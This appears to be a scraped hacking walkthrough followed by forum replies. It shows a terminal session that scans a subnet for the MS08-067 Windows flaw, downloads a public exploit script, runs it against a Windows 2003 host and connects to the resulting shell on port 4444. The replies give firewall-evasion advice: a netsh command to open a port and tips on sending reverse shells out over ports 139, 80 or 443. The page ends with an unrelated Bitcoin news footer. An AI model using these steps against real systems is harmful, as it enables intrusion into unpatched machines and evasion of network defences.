ms08-067

ms08-067
b4cktr4ck3 / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron
b4cktr4ck3 / # cd ron/nmap-smb
b4cktr4ck3 nmap-smb # ./configure
b4cktr4ck3 nmap-smb # make
b4cktr4ck3 nmap-smb # make install

b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse  -p 445 192.168.1.0/24

Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)

Interesting ports on 192.168.1.127:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Interesting ports on 192.168.1.128:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:04:4B:18:69:8A (Nvidia)

Interesting ports on 192.168.1.237:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)

Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067


b4cktr4ck3 / # wget https://ift.tt/2KYZUVk
--13:45:35--  https://ift.tt/2KYZUVk
           => `7132.py'
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    [ <=>                              ] 7,085         --.--K/s            

13:45:35 (233.53 KB/s) - `7132.py' saved [7085]

b4cktr4ck3 / # python 7132.py 192.168.1.237 2
#######################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#   www.hackingspirits.com
#   https://ift.tt/1mIk0WD
#   Email: d3basis.m0hanty @ gmail.com
#######################################################################

[-]Windows 2003[SP2] payload loaded
[-]Initiating connection
[-]connected to ncacn_np:192.168.1.237[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...

b4cktr4ck3 / # telnet 192.168.1.237 4444
Trying 192.168.1.237...
Connected to 192.168.1.237.
Escape character is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>


Are you using bind_tcp ?
reverse_tcp should bypass the firewall, but in order to use bind_tcp you have
to execute this command first netsh firewall set portopening TCP 6112
where 6112 is the port listened on by meterpreter. You could do that with for
example the "Windows Execute Command" payload.

You've got this a bit twisted. A bind_tcp payload will open a socket on the victim box and listen for connections to it. The problem with this is that a host based firewall may block incoming connections so that when your "evil hacker" box attempts to connect to the bind_tcp backdoor, it's incoming packet is blocked by the firewall and therefore cannot establish a connection with the listening bind_tcp socket.

A reverse_tcp backdoor does the opposite of a bind_tcp. It does not create a local listening socket, it establishes a reverse connection outbound from the victim to whatever IP and port you specified when you created the payload. This technique takes advantage of the fact that most network based firewalls may not allow traffic into the network, but will normally allow outbound traffic without any problem. Especially if your reverse_tcp shell is calling out to a popular port such as port 80 or 443. Also, some host based firewalls will allow these connections even if they are blocking incoming connections (usually because the user got tired of clicking "allow" or "deny" all the time).

For your specific problem, since file and print sharing is turned on, try a reverse_tcp to port TCP/139 of your "evil hacker" box (make sure samba is not running when you do this).

If you want to learn more about reverse_tcp, google for "shoveling a shell". That is the term normally associated with reverse_tcp connections.

-------------------------------

 What kind of payload are you using? If it is a simple tcp_backdoor then on the box you just exploited, open a cmd shell, run netstat -an and if you see TCP/4444 listening, then the problem is probably firewall related.

If you are using a reverse_tcp_backdoor, then my guess is that the victim is not allowing the backdoor to install/execute. Try a different payload.

Since you provided no information about your network or victim host setup, this is all I can think of.
Reply With Quote

------------------------------




from BITCOIN NEWS https://ift.tt/2IWAkQd
via Bitcoin News Update